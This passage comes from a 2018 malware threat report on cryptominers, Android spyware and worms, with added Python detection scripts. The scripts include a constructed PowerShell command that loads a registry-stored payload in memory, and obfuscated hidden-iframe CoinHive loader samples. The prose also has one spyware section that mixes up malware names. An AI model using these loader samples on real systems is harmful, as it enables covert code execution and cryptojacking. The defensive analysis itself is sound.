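BENIGN_TASK = "powershell.exe -NoProfile -EncodedCommand " + encode_ps(
    "Get-Date | Out-File C:/Temp/heartbeat.txt"
)
BADSHELL_LIKE_TASK = "powershell.exe -NoProfile -WindowStyle Hidden -enc " + encode_ps(
    r"$p=(Get-ItemProperty 'HKCU:\Software\CONSTRUCTED').Payload;"
    r"$b=[Convert]::FromBase64String($p);[Reflection.Assembly]::Load($b)"
)

if __name__ == "__main__":
    for task in (BENIGN_TASK, BADSHELL_LIKE_TASK):
        result = analyze_task_action(task)
        print(result["verdict"], result["indicators"])
        print("  decoded:", result["decoded"])
```

Encoded commands are not malicious in themselves, which is why a lone encoded argument only earns an "encoded" verdict here; it is the combination of a registry read with Base64 decoding and an in-memory load, the exact chain the screenshots show, that should page someone.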


The malicious code in the registry

Global Threat Report Q2 2018 Edition

Page 19 of 73

This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.

Invulnerability to antivirus software and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to the cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root itself into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes possess the system attribute "Critical Process", meaning that terminating either of them will crash the system, leaving the user with a blue screen.
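Because the process names here are those of a legitimate service host, detection has to look at attributes rather than names. The following added example (Python; not from the report) audits a process inventory for the traits this section describes: svchost.exe instances whose image path is outside the Windows system directories, whose parent is not services.exe, or that carry the critical-process flag (the BreakOnTermination attribute that produces the blue screen when such a process is killed). It also flags lookalike names one edit away from svchost.exe, which goes beyond this section's case. The inventory records, their field names and the assumption that a collector has already read the critical flag are all the example's own.

```python
"""Added example: audit a process inventory for abused or impersonated service
hosts. Not from the Comodo report. The records below are constructed; in a
real deployment they would come from an EDR export or a process snapshot that
includes the BreakOnTermination ("critical process") flag."""

EXPECTED_SVCHOST_PATHS = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\syswow64\svchost.exe",
}
EXPECTED_SVCHOST_PARENT = "services.exe"


def edit_distance(a, b):
    """Levenshtein distance, used to catch names one typo away from svchost.exe."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit_process(proc):
    """Return a list of reason codes for one process record ([] means nothing odd)."""
    name = proc["name"].lower()
    reasons = []
    if name == "svchost.exe":
        if proc["path"].lower() not in EXPECTED_SVCHOST_PATHS:
            reasons.append("unexpected_path")
        if proc["parent"].lower() != EXPECTED_SVCHOST_PARENT:
            reasons.append("unexpected_parent")
        if proc["critical"]:
            # A service host should not be marked critical; the report notes that
            # WinstarNssmMiner sets this so that killing it blue-screens the machine.
            reasons.append("critical_flag")
    elif edit_distance(name, "svchost.exe") == 1:
        reasons.append("lookalike_name")
    return reasons


def audit_service_hosts(processes):
    """Return [{'pid', 'name', 'reasons'}] for every process with at least one finding."""
    findings = []
    for proc in processes:
        reasons = audit_process(proc)
        if reasons:
            findings.append({"pid": proc["pid"], "name": proc["name"], "reasons": reasons})
    return findings


# Constructed inventory: one normal service host, two injected/critical ones in
# the style this section describes, one lookalike, and an unrelated process.
PROCESSES = [
    {"pid": 700, "name": "svchost.exe", "path": r"C:\Windows\System32\svchost.exe",
     "parent": "services.exe", "critical": False},
    {"pid": 4120, "name": "svchost.exe", "path": r"C:\Windows\System32\svchost.exe",
     "parent": "explorer.exe", "critical": True},
    {"pid": 4188, "name": "svchost.exe", "path": r"C:\Users\Public\svchost.exe",
     "parent": "svchost.exe", "critical": True},
    {"pid": 5000, "name": "svhost.exe", "path": r"C:\ProgramData\svhost.exe",
     "parent": "explorer.exe", "critical": False},
    {"pid": 1234, "name": "notepad.exe", "path": r"C:\Windows\System32\notepad.exe",
     "parent": "explorer.exe", "critical": False},
]

if __name__ == "__main__":
    for finding in audit_service_hosts(PROCESSES):
        print(finding["pid"], finding["name"], ", ".join(finding["reasons"]))
```

The critical-flag check matters for the response as much as for detection: a process carrying that flag must not simply be killed, since that is exactly the blue screen the report describes; it has to be dealt with from a state where it is not running, or by clearing the flag first.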

WinstarNssmMiner spreading around the world


Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out against other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows.

The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks if a miner is already running by testing for the presence of an "AMDDriver64" process.


The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.

In this way, CoinMiner exclusively occupies the victim's computer to use its resources for mining cryptocurrency.


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide. CoinHive is the brightest example of them.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.


As a result, the malicious code on a webpage looks like this.

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe.

The iframe loads the URL shortener

Notice that the width and height of the iframe are set to 1, to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we can find the familiar link to CoinHive.

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
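The camouflage described in this section can be undone mechanically. The following is an added example (Python; not from the report) of a page scanner that peels the common JavaScript string-hiding wrappers (unescape() percent-encoding and atob() Base64), rescans each decoded layer for iframes, and flags an iframe whose width and height are both 1 or whose source is the CoinHive domain or its cnhv.co short-link domain. It also catches the undisguised loader shown earlier in this section (a script tag pointing at coinhive.com, or a call to CoinHive.Anonymous), so one scanner covers both cases. The sample pages are constructed, the short-link path and site key are placeholders, and the wrapper and tag regexes are the example's own.

```python
"""Added example: find hidden CoinHive loaders behind JavaScript string
wrappers. Not from the Comodo report; sample pages are constructed."""
import base64
import binascii
import re
from urllib.parse import quote, unquote, urlparse

MINER_HOSTS = {"coinhive.com", "cnhv.co"}   # CoinHive's site and its short-link domain

UNESCAPE_CALL = re.compile(r"unescape\(\s*['\"]([^'\"]+)['\"]\s*\)", re.I)
ATOB_CALL = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
TAG = re.compile(r"<(iframe|script)\b([^>]*)>", re.I)
ATTR = re.compile(r"(\w+)\s*=\s*['\"]?([^'\"\s>]+)")
MINER_API = re.compile(r"CoinHive\.Anonymous\s*\(")


def decode_layers(html, max_depth=3):
    """Return the page plus every string recovered from unescape()/atob() wrappers."""
    layers, frontier = [html], [html]
    for _ in range(max_depth):
        found = []
        for text in frontier:
            found.extend(unquote(m.group(1)) for m in UNESCAPE_CALL.finditer(text))
            for m in ATOB_CALL.finditer(text):
                try:
                    found.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
                except (binascii.Error, ValueError):
                    continue
        if not found:
            break
        layers.extend(found)
        frontier = found
    return layers


def scan_page(html):
    """Return a list of (layer_index, kind, detail) findings; [] means nothing found."""
    findings = []
    for depth, text in enumerate(decode_layers(html)):
        if MINER_API.search(text):
            findings.append((depth, "miner_api_call", "CoinHive.Anonymous("))
        for tag, raw_attrs in TAG.findall(text):
            attrs = {k.lower(): v for k, v in ATTR.findall(raw_attrs)}
            src = attrs.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            if host in MINER_HOSTS:
                findings.append((depth, f"miner_{tag.lower()}", src))
            if tag.lower() == "iframe":
                size = [attrs.get("width"), attrs.get("height")]
                if all(s is not None and s.isdigit() and int(s) <= 1 for s in size):
                    findings.append((depth, "tiny_iframe", src))
    return findings


# Constructed samples. The short-link path and site key are placeholders.
HIDDEN_IFRAME = '<iframe src="https://cnhv.co/PLACEHOLDER" width="1" height="1"></iframe>'
UNESCAPE_PAGE = ('<html><body><p>news</p><script>document.write(unescape("'
                 + quote(HIDDEN_IFRAME, safe="") + '"));</script></body></html>')
ATOB_PAGE = ('<html><body><script>document.write(atob("'
             + base64.b64encode(HIDDEN_IFRAME.encode()).decode() + '"));</script></body></html>')
PLAIN_LOADER_PAGE = ('<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
                     '<script>var m = new CoinHive.Anonymous("PLACEHOLDER_KEY"); m.start();</script>')
CLEAN_PAGE = '<iframe src="https://www.example.com/embed" width="640" height="360"></iframe>'

if __name__ == "__main__":
    for name, page in (("unescape", UNESCAPE_PAGE), ("atob", ATOB_PAGE),
                       ("plain", PLAIN_LOADER_PAGE), ("clean", CLEAN_PAGE)):
        print(name, scan_page(page))
```

The point of reporting the layer index is that on the obfuscated pages every finding sits at layer 1, not layer 0: a scanner that only greps the page source, which is what the user in the scenario above did, sees nothing.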

The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed characters and numbers, so it is almost impossible to remember or fill in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a gap they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added the malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack.

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
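The swap in the example above is detectable at the one moment it matters: when the address is about to be pasted. Below is an added example (Python; not from the report) of a paste-time guard: it remembers the address the user deliberately copied, classifies clipboard contents by public address format (Bitcoin Base58 and bech32, Ethereum), and reports a swap when the clipboard holds a different address from the one copied. The two addresses are the ones quoted above; the class, its method names and the scripted event replay are the example's own, and a real deployment would feed it clipboard-change notifications from the OS rather than the constructed list used here.

```python
"""Added example: paste-time guard against clipboard wallet-address swapping.
Not from the Comodo report. The guard is fed constructed clipboard events; a
real deployment would hook the OS clipboard-change notification instead."""
import re

# Public address shapes (format checks only, no checksum validation).
WALLET_PATTERNS = {
    "btc_base58": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),  # legacy / P2SH
    "btc_bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{11,87}$"),        # native segwit
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def classify_address(text):
    """Return the address kind for text, or None if it is not a wallet address."""
    text = text.strip()
    for kind, pattern in WALLET_PATTERNS.items():
        if pattern.match(text):
            return kind
    return None


def abbreviate(address, keep=6):
    """Shorten an address for a confirmation prompt: first and last `keep` characters."""
    return f"{address[:keep]}...{address[-keep:]}"


class ClipboardGuard:
    """Remembers what the user copied and checks the clipboard before a paste."""

    def __init__(self):
        self.expected = None

    def user_copied(self, text):
        """Hook for a deliberate copy action; only wallet addresses are tracked."""
        self.expected = text.strip() if classify_address(text) else None

    def observe(self, clipboard_text):
        """Compare current clipboard contents with the address the user copied.

        Returns None when nothing is wrong, otherwise a finding dict.
        """
        current = clipboard_text.strip()
        if self.expected is None or current == self.expected:
            return None
        kind = classify_address(current)
        if kind is None:
            # The user copied something else; stop tracking the old address.
            self.expected = None
            return None
        return {
            "event": "address_swapped",
            "expected": self.expected,
            "observed": current,
            "observed_kind": kind,
            "prompt": f"Clipboard now holds {abbreviate(current)}, "
                      f"but you copied {abbreviate(self.expected)}. Do not paste.",
        }


def replay(events):
    """Run a list of ('copy', text) / ('paste', clipboard_text) events; return findings."""
    guard = ClipboardGuard()
    findings = []
    for action, text in events:
        if action == "copy":
            guard.user_copied(text)
        elif action == "paste":
            finding = guard.observe(text)
            if finding:
                findings.append(finding)
    return findings


# The two addresses quoted in the report's example (copied vs. substituted).
COPIED = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
SUBSTITUTED = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"

# Constructed event sequence: a clean paste, then a hijacked one.
EVENTS = [
    ("copy", COPIED),
    ("paste", COPIED),        # untouched clipboard, nothing to report
    ("copy", COPIED),
    ("paste", SUBSTITUTED),   # clipboard silently replaced between copy and paste
]

if __name__ == "__main__":
    for finding in replay(EVENTS):
        print(finding["prompt"])
```

Even without any tooling, the abbreviated form in the prompt is the habit worth teaching: compare the first and last few characters of the pasted address against the source before confirming a transfer, since a hijacker that holds millions of substitute addresses, as the sample above does, can match a prefix but rarely both ends.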


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions.

Version 1: Naver Defender
Version 2: Netease Defender
Version 3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional abilities for spying. It steals account details and contacts (id, name, phone numbers and email address of the owner). It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control over the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version 3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.

Version 1: Dardesh (Google Play Services, Instant Apps)
Version 2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions.

Version 1: Telegram Groups انتخاب دھم
Version 2: Postrall Yes For Referendum انتخاب دھم
Version 3: Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version 4: VPN Easy DroFirewall m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.

The third version is included in spyware named "Spymaster Pro" and can:

Enable and disable the GPS services

Record audio and send it to the Command & Control server

Upload image files

Collect information about the applications installed

Collect browser data

Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.


In addition to the abilities of previous versions, it includes some additional tricks:

Extracts photos, audio and video

Records the screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

Takes control over the Bluetooth adapter

Extracts data about accounts, contact details and installed apps

Extracts data from the WhatsApp message DB and related keys

Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Versions 1 to 3: Facebook, Chrome

Disguises of Xloader


After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs

Extract contacts details

Set Wi-Fi to always on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable a Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

App Distribution

FlexiSpy MBackup

HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service


Mobile Spy

随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z

CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1: Adobe Flash Player
Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device.


Send_SMS: extract SMS content and send it to the C&C server

Send_USSD: send the USSD to the C&C server

Gethistory: monitor browser history

Start_AllApp: gather info about installed applications

Send_call: set the Intent action to call

Forward_call: forward incoming calls

ResForward_call: reset call forwarding

Go_Smsmnd: delete SMS content

Go_GetAlls: get SMS history

Dell_sms: delete SMS content in a conversation

Send_spam: send spam SMS

Start_Inject: call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot.

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp softbankcomapp docomocomapp

Here are some commands from its Command and Control server:

contacts: get contact details and email id

Mute: set action to mute

Mms: get MMS content

info: get device information


4.1.8 RedAlert

RedAlert changes between multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber

Version_2 Update Google Market Flash Player Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It scans the device in search of the following bank applications:

depostbankfinanzassistent

plmbank

aibibankandroid

The second version can block access to some websites and apps, including Google Chrome, the Google Play Store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly operates on Iranian territory. It uses third-party app stores, social networks and messengers to spread.

Version 1

CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره

Proxy دوست یاب Telegram Ton


شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Notably, it is sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run", but it keeps running in the background and starts its spying activity. It steals text messages, makes audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1

Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot

Reccoder-Call QRCodeBar Scanner APK

Let me love you ringtone Iphone Ringtone Night light

Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay


Sonvpay covertly subscribes the infected device to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises named above.

4.1.11 CoinHive

The last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of them upgrading its mining potential. It is disseminated via the counterfeit apps you see below, but one of the vectors is especially interesting.

Version-1 Netflix Hack Instagram Hack

Version-2 TSF Launcher

Version-3 Android Service PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via... another cryptominer named CoinMiner.

How is this possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

[Figure: Android-targeted malware in April]

4.2.2 May 2018

[Figure: Android-targeted malware in May]


4.2.3 June 2018

[Figure: Android-targeted malware in June]


5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

Finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that they can also travel between victim computers by other means, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.


5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

